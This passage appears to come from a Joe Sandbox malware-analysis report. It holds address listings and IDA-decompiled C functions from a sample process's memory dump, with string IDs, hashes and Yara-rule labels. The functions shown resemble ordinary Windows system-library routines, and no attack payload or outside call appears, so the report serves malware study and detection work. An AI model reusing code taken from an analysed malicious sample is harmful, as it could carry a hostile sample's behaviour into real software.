                                                    0x00b50fb5
                                                    0x00b50fc6
                                                    0x00b50fd1
                                                    0x00b50fe3
                                                    0x00b50fd3
                                                    0x00b50fdc
                                                    0x00b50fdc
                                                    0x00b50feb
                                                    0x00b51009
                                                    0x00b51009
                                                    0x00b51015
                                                    0x00b51027
                                                    0x00b51017
                                                    0x00b51020
                                                    0x00b51020
                                                    0x00b5102f
                                                    0x00b5103c
                                                    0x00b5103c
                                                    0x00b51048
                                                    0x00b51050
                                                    0x00b51050
                                                    0x00b51055
                                                    0x00000000
                                                    0x00b51055
                                                    0x00b50f88
                                                    0x00b50f9e
                                                    0x00b50fa2
                                                    0x00b50fa9
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00b50fa9
                                                    0x00000000

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.331478562.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A60000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_a60000_tqxwmam.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: `
                                                    • API String ID: 0-2679148245
                                                    • Opcode ID: f19c2408d36eac23c3770e4016d0c73945a0063fa337b00b25bb9dc2082ad2df
                                                    • Instruction ID: 918888640e05abbfa6e5bdd00bf6d5fd1dd084744431b95a55f7cc84e43fb975
                                                    • Opcode Fuzzy Hash: f19c2408d36eac23c3770e4016d0c73945a0063fa337b00b25bb9dc2082ad2df
                                                    • Instruction Fuzzy Hash: D851CE712083429FD725EF28D885B2BB7E5EBC4305F0809ACF99697291D770ED49CB62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00ABF0BF Relevance: 1.4, Strings: 1, Instructions: 137COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 75%
                                                    			E00ABF0BF(signed short* __ecx, signed short __edx, void* __eflags, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char* _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char _v44;
				char _v52;
				intOrPtr _v56;
				char _v60;
				intOrPtr _v72;
				void* _t51;
				void* _t58;
				signed short _t82;
				short _t84;
				signed int _t91;
				signed int _t100;
				signed short* _t103;
				void* _t108;
				intOrPtr* _t109;

				_t103 = __ecx;
				_t82 = __edx;
				_t51 = E00AA4120(0, __ecx, 0,  &_v52, 0, 0, 0);
				if(_t51 >= 0) {
					_push(0x21);
					_push(3);
					_v56 =  *0x7ffe02dc;
					_v20 =  &_v52;
					_push( &_v44);
					_v28 = 0x18;
					_push( &_v28);
					_push(0x100020);
					_v24 = 0;
					_push( &_v60);
					_v16 = 0x40;
					_v12 = 0;
					_v8 = 0;
					_t58 = E00AC9830();
					_t87 =  *[fs:0x30];
					_t108 = _t58;
					L00AA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v72);
					if(_t108 < 0) {
						L11:
						_t51 = _t108;
					} else {
						_push(4);
						_push(8);
						_push( &_v36);
						_push( &_v44);
						_push(_v60);
						_t108 = E00AC9990();
						if(_t108 < 0) {
							L10:
							_push(_v60);
							E00AC95D0();
							goto L11;
						} else {
							_t109 = L00AA4620(_t87,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t82 + 0x18);
							if(_t109 == 0) {
								_t108 = 0xc0000017;
								goto L10;
							} else {
								_t21 = _t109 + 0x18; // 0x18
								 *((intOrPtr*)(_t109 + 4)) = _v60;
								 *_t109 = 1;
								 *((intOrPtr*)(_t109 + 0x10)) = _t21;
								 *(_t109 + 0xe) = _t82;
								 *((intOrPtr*)(_t109 + 8)) = _v56;
								 *((intOrPtr*)(_t109 + 0x14)) = _v32;
								E00ACF3E0(_t21, _t103[2],  *_t103 & 0x0000ffff);
								 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
								 *((short*)(_t109 + 0xc)) =  *_t103;
								_t91 =  *_t103 & 0x0000ffff;
								_t100 = _t91 & 0xfffffffe;
								_t84 = 0x5c;
								if( *((intOrPtr*)(_t103[2] + _t100 - 2)) != _t84) {
									if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) {
										_push(_v60);
										E00AC95D0();
										L00AA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
										_t51 = 0xc0000106;
									} else {
										 *((short*)(_t100 +  *((intOrPtr*)(_t109 + 0x10)))) = _t84;
										 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
										 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2;
										goto L5;
									}
								} else {
									L5:
									 *_a4 = _t109;
									_t51 = 0;
								}
							}
						}
					}
				}
				return _t51;
			}

























                                                    0x00abf0d3
                                                    0x00abf0d9
                                                    0x00abf0e0
                                                    0x00abf0e7
                                                    0x00abf0f2
                                                    0x00abf0f4
                                                    0x00abf0f8
                                                    0x00abf100
                                                    0x00abf108
                                                    0x00abf10d
                                                    0x00abf115
                                                    0x00abf116
                                                    0x00abf11f
                                                    0x00abf123
                                                    0x00abf124
                                                    0x00abf12c
                                                    0x00abf130
                                                    0x00abf134
                                                    0x00abf13d
                                                    0x00abf144
                                                    0x00abf14b
                                                    0x00abf152
                                                    0x00afbab0
                                                    0x00afbab0
                                                    0x00abf158
                                                    0x00abf158
                                                    0x00abf15a
                                                    0x00abf160
                                                    0x00abf165
                                                    0x00abf166
                                                    0x00abf16f
                                                    0x00abf173
                                                    0x00afbaa7
                                                    0x00afbaa7
                                                    0x00afbaab
                                                    0x00000000
                                                    0x00abf179
                                                    0x00abf18d
                                                    0x00abf191
                                                    0x00afbaa2
                                                    0x00000000
                                                    0x00abf197
                                                    0x00abf19b
                                                    0x00abf1a2
                                                    0x00abf1a9
                                                    0x00abf1af
                                                    0x00abf1b2
                                                    0x00abf1b6
                                                    0x00abf1b9
                                                    0x00abf1c4
                                                    0x00abf1d8
                                                    0x00abf1df
                                                    0x00abf1e3
                                                    0x00abf1eb
                                                    0x00abf1ee
                                                    0x00abf1f4
                                                    0x00abf20f
                                                    0x00afbab7
                                                    0x00afbabb
                                                    0x00afbacc
                                                    0x00afbad1
                                                    0x00abf215
                                                    0x00abf218
                                                    0x00abf226
                                                    0x00abf22b
                                                    0x00000000
                                                    0x00abf22b
                                                    0x00abf1f6
                                                    0x00abf1f6
                                                    0x00abf1f9
                                                    0x00abf1fb
                                                    0x00abf1fb
                                                    0x00abf1f4
                                                    0x00abf191
                                                    0x00abf173
                                                    0x00abf152
                                                    0x00abf203

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.331478562.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A60000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_a60000_tqxwmam.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: @
                                                    • API String ID: 0-2766056989
                                                    • Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                                    • Instruction ID: 8bc1f46982d5d6842142a070dfc1f33c9cbd51a8f2dc3b04d980e791c2431581
                                                    • Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                                    • Instruction Fuzzy Hash: AD519C71504714AFC320DF68C941A6BB7F8FF48710F008A2DFA9587691E7B4E904CBA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00B03540 Relevance: 1.4, Strings: 1, Instructions: 130COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 75%
                                                    			E00B03540(intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v88;
				intOrPtr _v92;
				char _v96;
				char _v352;
				char _v1072;
				intOrPtr _v1140;
				intOrPtr _v1148;
				char _v1152;
				char _v1156;
				char _v1160;
				char _v1164;
				char _v1168;
				char* _v1172;
				short _v1174;
				char _v1176;
				char _v1180;
				char _v1192;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				short _t41;
				short _t42;
				intOrPtr _t80;
				intOrPtr _t81;
				signed int _t82;
				void* _t83;

				_v12 =  *0xb7d360 ^ _t82;
				_t41 = 0x14;
				_v1176 = _t41;
				_t42 = 0x16;
				_v1174 = _t42;
				_v1164 = 0x100;
				_v1172 = L"BinaryHash";
				_t81 = E00AC0BE0(0xfffffffc,  &_v352,  &_v1164, 0, 0, 0,  &_v1192);
				if(_t81 < 0) {
					L11:
					_t75 = _t81;
					E00B03706(0, _t81, _t79, _t80);
					L12:
					if(_a4 != 0xc000047f) {
						E00ACFA60( &_v1152, 0, 0x50);
						_v1152 = 0x60c201e;
						_v1148 = 1;
						_v1140 = E00B03540;
						E00ACFA60( &_v1072, 0, 0x2cc);
						_push( &_v1072);
						E00ADDDD0( &_v1072, _t75, _t79, _t80, _t81);
						E00B10C30(0, _t75, _t80,  &_v1152,  &_v1072, 2);
						_push(_v1152);
						_push(0xffffffff);
						E00AC97C0();
					}
					return E00ACB640(0xc0000135, 0, _v12 ^ _t82, _t79, _t80, _t81);
				}
				_t79 =  &_v352;
				_t81 = E00B03971(0, _a4,  &_v352,  &_v1156);
				if(_t81 < 0) {
					goto L11;
				}
				_t75 = _v1156;
				_t79 =  &_v1160;
				_t81 = E00B03884(_v1156,  &_v1160,  &_v1168);
				if(_t81 >= 0) {
					_t80 = _v1160;
					E00ACFA60( &_v96, 0, 0x50);
					_t83 = _t83 + 0xc;
					_push( &_v1180);
					_push(0x50);
					_push( &_v96);
					_push(2);
					_push( &_v1176);
					_push(_v1156);
					_t81 = E00AC9650();
					if(_t81 >= 0) {
						if(_v92 != 3 || _v88 == 0) {
							_t81 = 0xc000090b;
						}
						if(_t81 >= 0) {
							_t75 = _a4;
							_t79 =  &_v352;
							E00B03787(_a4,  &_v352, _t80);
						}
					}
					L00AA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v1168);
				}
				_push(_v1156);
				E00AC95D0();
				if(_t81 >= 0) {
					goto L12;
				} else {
					goto L11;
				}
			}































                                                    0x00b03552
                                                    0x00b0355a
                                                    0x00b0355d
                                                    0x00b03566
                                                    0x00b03567
                                                    0x00b0357e
                                                    0x00b0358f
                                                    0x00b035a1
                                                    0x00b035a5
                                                    0x00b0366b
                                                    0x00b0366b
                                                    0x00b0366d
                                                    0x00b03672
                                                    0x00b03679
                                                    0x00b03685
                                                    0x00b0368d
                                                    0x00b0369d
                                                    0x00b036a7
                                                    0x00b036b8
                                                    0x00b036c6
                                                    0x00b036c7
                                                    0x00b036dc
                                                    0x00b036e1
                                                    0x00b036e7
                                                    0x00b036e9
                                                    0x00b036e9
                                                    0x00b03703
                                                    0x00b03703
                                                    0x00b035b5
                                                    0x00b035c0
                                                    0x00b035c4
                                                    0x00000000
                                                    0x00000000
                                                    0x00b035ca
                                                    0x00b035d7
                                                    0x00b035e2
                                                    0x00b035e6
                                                    0x00b035e8
                                                    0x00b035f5
                                                    0x00b035fa
                                                    0x00b03603
                                                    0x00b03604
                                                    0x00b03609
                                                    0x00b0360a
                                                    0x00b03612
                                                    0x00b03613
                                                    0x00b0361e
                                                    0x00b03622
                                                    0x00b03628
                                                    0x00b0362f
                                                    0x00b0362f
                                                    0x00b03636
                                                    0x00b03638
                                                    0x00b0363b
                                                    0x00b03642
                                                    0x00b03642
                                                    0x00b03636
                                                    0x00b03657
                                                    0x00b03657
                                                    0x00b0365c
                                                    0x00b03662
                                                    0x00b03669
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.331478562.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A60000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_a60000_tqxwmam.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: BinaryHash
                                                    • API String ID: 0-2202222882
                                                    • Opcode ID: 8be3e6374c8bc0fd402decd0b3de5d85888b34009426fc9cef6bb65e774cff27
                                                    • Instruction ID: 8d968e10634b8d911649339961c84a981c7f5f382c268c86bfdaf7ad4ed86ad9
                                                    • Opcode Fuzzy Hash: 8be3e6374c8bc0fd402decd0b3de5d85888b34009426fc9cef6bb65e774cff27
                                                    • Instruction Fuzzy Hash: 674144F190052CAADF21DA50CD85FEEB7BCAB44714F0145E5A609AB281DB319F888F94
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00B505AC Relevance: 1.4, Strings: 1, Instructions: 115COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 71%
                                                    			E00B505AC(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v28;
				char _v32;
				signed int _v36;
				intOrPtr _v40;
				void* __ebx;
				void* _t35;
				signed int _t42;
				char* _t48;
				signed int _t59;
				signed char _t61;
				signed int* _t79;
				void* _t88;

				_v28 = __edx;
				_t79 = __ecx;
				if(E00B507DF(__ecx, __edx,  &_a4,  &_a8, 0) == 0) {
					L13:
					_t35 = 0;
					L14:
					return _t35;
				}
				_t61 = __ecx[1];
				_t59 = __ecx[0xf];
				_v32 = (_a4 << 0xc) + (__edx - ( *__ecx & __edx) >> 4 << _t61) + ( *__ecx & __edx);
				_v36 = _a8 << 0xc;
				_t42 =  *(_t59 + 0xc) & 0x40000000;
				asm("sbb esi, esi");
				_t88 = ( ~_t42 & 0x0000003c) + 4;
				if(_t42 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t59);
					_push(0xffffffff);
					if(E00AC9730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t59) {
						_push(_t61);
						E00B4A80D(_t59, 1, _v20, 0);
						_t88 = 4;
					}
				}
				_t35 = E00B4A854( &_v32,  &_v36, 0, 0x1000, _t88, 0,  *((intOrPtr*)(_t79 + 0x34)),  *((intOrPtr*)(_t79 + 0x38)));
				if(_t35 < 0) {
					goto L14;
				}
				E00B51293(_t79, _v40, E00B507DF(_t79, _v28,  &_a4,  &_a8, 1));
				if(E00AA7D50() == 0) {
					_t48 = 0x7ffe0380;
				} else {
					_t48 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				if( *_t48 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
					E00B4138A(_t59,  *((intOrPtr*)(_t79 + 0x3c)), _v32, _v36, 0xa);
				}
				goto L13;
			}

















                                                    0x00b505c5
                                                    0x00b505ca
                                                    0x00b505d3
                                                    0x00b506db
                                                    0x00b506db
                                                    0x00b506dd
                                                    0x00b506e3
                                                    0x00b506e3
                                                    0x00b505dd
                                                    0x00b505e7
                                                    0x00b505f6
                                                    0x00b50600
                                                    0x00b50607
                                                    0x00b50610
                                                    0x00b50615
                                                    0x00b5061a
                                                    0x00b5061c
                                                    0x00b5061e
                                                    0x00b50624
                                                    0x00b50625
                                                    0x00b50627
                                                    0x00b50628
                                                    0x00b50631
                                                    0x00b50640
                                                    0x00b5064d
                                                    0x00b50654
                                                    0x00b50654
                                                    0x00b50631
                                                    0x00b5066d
                                                    0x00b50674
                                                    0x00000000
                                                    0x00000000
                                                    0x00b50692
                                                    0x00b5069e
                                                    0x00b506b0
                                                    0x00b506a0
                                                    0x00b506a9
                                                    0x00b506a9
                                                    0x00b506b8
                                                    0x00b506d6
                                                    0x00b506d6
                                                    0x00000000

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.331478562.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A60000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_a60000_tqxwmam.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: `
                                                    • API String ID: 0-2679148245
                                                    • Opcode ID: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                                    • Instruction ID: e13842905437137adce4aaa548158647330b2d661e321456d92c88e43c76629e
                                                    • Opcode Fuzzy Hash: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                                    • Instruction Fuzzy Hash: 1F310232614305ABE720EE28CD85F9B77D9EBC4754F0442A9FE58AB280D770ED18CB91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00B03884 Relevance: 1.3, Strings: 1, Instructions: 95COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 72%
                                                    			E00B03884(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				char* _v20;
				short _v22;
				char _v24;
				intOrPtr _t38;
				short _t40;
				short _t41;
				void* _t44;
				intOrPtr _t47;
				void* _t48;

				_v16 = __edx;
				_t40 = 0x14;
				_v24 = _t40;
				_t41 = 0x16;
				_v22 = _t41;
				_t38 = 0;
				_v12 = __ecx;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(2);
				_t43 =  &_v24;
				_v20 = L"BinaryName";
				_push( &_v24);
				_push(__ecx);
				_t47 = 0;
				_t48 = E00AC9650();
				if(_t48 >= 0) {
					_t48 = 0xc000090b;
				}
				if(_t48 != 0xc0000023) {
					_t44 = 0;
					L13:
					if(_t48 < 0) {
						L16:
						if(_t47 != 0) {
							L00AA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t44, _t47);
						}
						L18:
						return _t48;
					}
					 *_v16 = _t38;
					 *_a4 = _t47;
					goto L18;
				}
				_t47 = L00AA4620(_t43,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				if(_t47 != 0) {
					_push( &_v8);
					_push(_v8);
					_push(_t47);
					_push(2);
					_push( &_v24);
					_push(_v12);
					_t48 = E00AC9650();
					if(_t48 < 0) {
						_t44 = 0;
						goto L16;
					}
					if( *((intOrPtr*)(_t47 + 4)) != 1 ||  *(_t47 + 8) < 4) {
						_t48 = 0xc000090b;
					}
					_t44 = 0;
					if(_t48 < 0) {
						goto L16;
					} else {
						_t17 = _t47 + 0xc; // 0xc
						_t38 = _t17;
						if( *((intOrPtr*)(_t38 + ( *(_t47 + 8) >> 1) * 2 - 2)) != 0) {
							_t48 = 0xc000090b;
						}
						goto L13;
					}
				}
				_t48 = _t48 + 0xfffffff4;
				goto L18;
			}















                                                    0x00b03893
                                                    0x00b03896
                                                    0x00b03899
                                                    0x00b0389f
                                                    0x00b038a0
                                                    0x00b038a4
                                                    0x00b038a9
                                                    0x00b038ac
                                                    0x00b038ad
                                                    0x00b038ae
                                                    0x00b038af
                                                    0x00b038b1
                                                    0x00b038b4
                                                    0x00b038bb
                                                    0x00b038bc
                                                    0x00b038bd
                                                    0x00b038c4
                                                    0x00b038c8
                                                    0x00b038ca
                                                    0x00b038ca
                                                    0x00b038d5
                                                    0x00b0393e
                                                    0x00b03940
                                                    0x00b03942
                                                    0x00b03952
                                                    0x00b03954
                                                    0x00b03961
                                                    0x00b03961
                                                    0x00b03967
                                                    0x00b0396e
                                                    0x00b0396e
                                                    0x00b03947
                                                    0x00b0394c
                                                    0x00000000
                                                    0x00b0394c
                                                    0x00b038ea
                                                    0x00b038ee
                                                    0x00b038f8
                                                    0x00b038f9
                                                    0x00b038ff
                                                    0x00b03900
                                                    0x00b03902
                                                    0x00b03903
                                                    0x00b0390b
                                                    0x00b0390f
                                                    0x00b03950
                                                    0x00000000
                                                    0x00b03950
                                                    0x00b03915
                                                    0x00b0391d
                                                    0x00b0391d
                                                    0x00b03922
                                                    0x00b03926
                                                    0x00000000
                                                    0x00b03928
                                                    0x00b0392b
                                                    0x00b0392b
                                                    0x00b03935
                                                    0x00b03937
                                                    0x00b03937
                                                    0x00000000
                                                    0x00b03935
                                                    0x00b03926
                                                    0x00b038f0
                                                    0x00000000

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.331478562.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A60000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_a60000_tqxwmam.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: BinaryName
                                                    • API String ID: 0-215506332
                                                    • Opcode ID: 852706aaecab91ff91bccc04777acdcb0bbf0c1c9bf78b3d48c82eea5742fa81
                                                    • Instruction ID: 9e3cea86a11eaddfcd8bac6e527bf740032dcdb999dc852cc8949983e928b06e
                                                    • Opcode Fuzzy Hash: 852706aaecab91ff91bccc04777acdcb0bbf0c1c9bf78b3d48c82eea5742fa81
                                                    • Instruction Fuzzy Hash: FF31D432900619AFDB15DB58C949E7BBBF8EB81B20F1181A9A956A72D0D7709F00C7A0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00ABD294 Relevance: 1.3, Strings: 1, Instructions: 93COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 33%
                                                    			E00ABD294(void* __ecx, char __edx, void* __eflags) {
				signed int _v8;
				char _v52;
				signed int _v56;
				signed int _v60;
				intOrPtr _v64;
				char* _v68;
				intOrPtr _v72;
				char _v76;
				signed int _v84;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				char _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				char _t38;
				signed int _t40;
				signed int _t44;
				signed int _t52;
				void* _t53;
				void* _t55;
				void* _t61;
				intOrPtr _t62;
				void* _t64;
				signed int _t65;
				signed int _t66;

				_t68 = (_t66 & 0xfffffff8) - 0x6c;
				_v8 =  *0xb7d360 ^ (_t66 & 0xfffffff8) - 0x0000006c;
				_v105 = __edx;
				_push( &_v92);
				_t52 = 0;
				_push(0);
				_push(0);
				_push( &_v104);
				_push(0);
				_t59 = __ecx;
				_t55 = 2;
				if(E00AA4120(_t55, __ecx) < 0) {
					_t35 = 0;
					L8:
					_pop(_t61);
					_pop(_t64);
					_pop(_t53);
					return E00ACB640(_t35, _t53, _v8 ^ _t68, _t59, _t61, _t64);
				}
				_v96 = _v100;
				_t38 = _v92;
				if(_t38 != 0) {
					_v104 = _t38;
					_v100 = _v88;
					_t40 = _v84;
				} else {
					_t40 = 0;
				}
				_v72 = _t40;
				_v68 =  &_v104;
				_push( &_v52);
				_v76 = 0x18;
				_push( &_v76);
				_v64 = 0x40;
				_v60 = _t52;
				_v56 = _t52;
				_t44 = E00AC98D0();
				_t62 = _v88;
				_t65 = _t44;
				if(_t62 != 0) {
					asm("lock xadd [edi], eax");
					if((_t44 | 0xffffffff) != 0) {
						goto L4;
					}
					_push( *((intOrPtr*)(_t62 + 4)));
					E00AC95D0();
					L00AA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _t62);
					goto L4;
				} else {
					L4:
					L00AA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _v96);
					if(_t65 >= 0) {
						_t52 = 1;
					} else {
						if(_t65 == 0xc0000043 || _t65 == 0xc0000022) {
							_t52 = _t52 & 0xffffff00 | _v105 != _t52;
						}
					}
					_t35 = _t52;
					goto L8;
				}
			}

































                                                    0x00abd29c
                                                    0x00abd2a6
                                                    0x00abd2b1
                                                    0x00abd2b5
                                                    0x00abd2b6
                                                    0x00abd2bc
                                                    0x00abd2bd
                                                    0x00abd2be
                                                    0x00abd2bf
                                                    0x00abd2c2
                                                    0x00abd2c4
                                                    0x00abd2cc
                                                    0x00abd384
                                                    0x00abd34b
                                                    0x00abd34f
                                                    0x00abd350
                                                    0x00abd351
                                                    0x00abd35c
                                                    0x00abd35c
                                                    0x00abd2d6
                                                    0x00abd2da
                                                    0x00abd2e1
                                                    0x00abd361
                                                    0x00abd369
                                                    0x00abd36d
                                                    0x00abd2e3
                                                    0x00abd2e3
                                                    0x00abd2e3
                                                    0x00abd2e5
                                                    0x00abd2ed
                                                    0x00abd2f5
                                                    0x00abd2fa
                                                    0x00abd302
                                                    0x00abd303
                                                    0x00abd30b
                                                    0x00abd30f
                                                    0x00abd313
                                                    0x00abd318
                                                    0x00abd31c
                                                    0x00abd320
                                                    0x00abd379
                                                    0x00abd37d
                                                    0x00000000
                                                    0x00000000
                                                    0x00afaffe
                                                    0x00afb001
                                                    0x00afb011
                                                    0x00000000
                                                    0x00abd322
                                                    0x00abd322
                                                    0x00abd330
                                                    0x00abd337
                                                    0x00abd35d
                                                    0x00abd339
                                                    0x00abd33f
                                                    0x00abd38c
                                                    0x00abd38c
                                                    0x00abd33f
                                                    0x00abd349
                                                    0x00000000
                                                    0x00abd349

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.331478562.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A60000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_a60000_tqxwmam.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: @
                                                    • API String ID: 0-2766056989
                                                    • Opcode ID: 3b1ee7b9438f3d88ed7780ee086753a94ac59326fffdd5c3fc6da35523b3c260
                                                    • Instruction ID: 7c5f255887e237192b46eaa24a9a61263b5428775c61722504e798e893e39636
                                                    • Opcode Fuzzy Hash: 3b1ee7b9438f3d88ed7780ee086753a94ac59326fffdd5c3fc6da35523b3c260
                                                    • Instruction Fuzzy Hash: F0319CB65083059FC311DF28C981AABBBECEB89754F10092EF9959B252E735DD04CB93
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00A91B8F Relevance: 1.3, Strings: 1, Instructions: 86COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 72%
                                                    			E00A91B8F(void* __ecx, intOrPtr __edx, intOrPtr* _a4, signed int* _a8) {
				intOrPtr _v8;
				char _v16;
				intOrPtr* _t26;
				intOrPtr _t29;
				void* _t30;
				signed int _t31;

				_t27 = __ecx;
				_t29 = __edx;
				_t31 = 0;
				_v8 = __edx;
				if(__edx == 0) {
					L18:
					_t30 = 0xc000000d;
					goto L12;
				} else {
					_t26 = _a4;
					if(_t26 == 0 || _a8 == 0 || __ecx == 0) {
						goto L18;
					} else {
						E00ACBB40(__ecx,  &_v16, __ecx);
						_push(_t26);
						_push(0);
						_push(0);
						_push(_t29);
						_push( &_v16);
						_t30 = E00ACA9B0();
						if(_t30 >= 0) {
							_t19 =  *_t26;
							if( *_t26 != 0) {
								goto L7;
							} else {
								 *_a8 =  *_a8 & 0;
							}
						} else {
							if(_t30 != 0xc0000023) {
								L9:
								_push(_t26);
								_push( *_t26);
								_push(_t31);
								_push(_v8);
								_push( &_v16);
								_t30 = E00ACA9B0();
								if(_t30 < 0) {
									L12:
									if(_t31 != 0) {
										L00AA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t31);
									}
								} else {
									 *_a8 = _t31;
								}
							} else {
								_t19 =  *_t26;
								if( *_t26 == 0) {
									_t31 = 0;
								} else {
									L7:
									_t31 = L00AA4620(_t27,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t19);
								}
								if(_t31 == 0) {
									_t30 = 0xc0000017;
								} else {
									goto L9;
								}
							}
						}
					}
				}
				return _t30;
			}









                                                    0x00a91b8f
                                                    0x00a91b9a
                                                    0x00a91b9c
                                                    0x00a91b9e
                                                    0x00a91ba3
                                                    0x00ae7010
                                                    0x00ae7010
                                                    0x00000000
                                                    0x00a91ba9
                                                    0x00a91ba9
                                                    0x00a91bae
                                                    0x00000000
                                                    0x00a91bc5
                                                    0x00a91bca
                                                    0x00a91bcf
                                                    0x00a91bd0
                                                    0x00a91bd1
                                                    0x00a91bd2
                                                    0x00a91bd6
                                                    0x00a91bdc
                                                    0x00a91be0
                                                    0x00ae6ffc
                                                    0x00ae7000
                                                    0x00000000
                                                    0x00ae7006
                                                    0x00ae7009
                                                    0x00ae7009
                                                    0x00a91be6
                                                    0x00a91bec
                                                    0x00a91c0b
                                                    0x00a91c0b
                                                    0x00a91c0c
                                                    0x00a91c11
                                                    0x00a91c12
                                                    0x00a91c15
                                                    0x00a91c1b
                                                    0x00a91c1f
                                                    0x00a91c31
                                                    0x00a91c33
                                                    0x00ae7026
                                                    0x00ae7026
                                                    0x00a91c21
                                                    0x00a91c24
                                                    0x00a91c24
                                                    0x00a91bee
                                                    0x00a91bee
                                                    0x00a91bf2
                                                    0x00a91c3a
                                                    0x00a91bf4
                                                    0x00a91bf4
                                                    0x00a91c05
                                                    0x00a91c05
                                                    0x00a91c09
                                                    0x00a91c3e
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00a91c09
                                                    0x00a91bec
                                                    0x00a91be0
                                                    0x00a91bae
                                                    0x00a91c2e

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.331478562.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A60000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_a60000_tqxwmam.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: WindowsExcludedProcs
                                                    • API String ID: 0-3583428290
                                                    • Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                                    • Instruction ID: 7649d1c3785b45ccac85b98af36745e36cb9d73a6ae1124108583220409a7591
                                                    • Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                                    • Instruction Fuzzy Hash: 9D21C277A41229ABCF229B5AD940F6FB7FDAF85B50F164825F9049B200DA34DD01D7A0
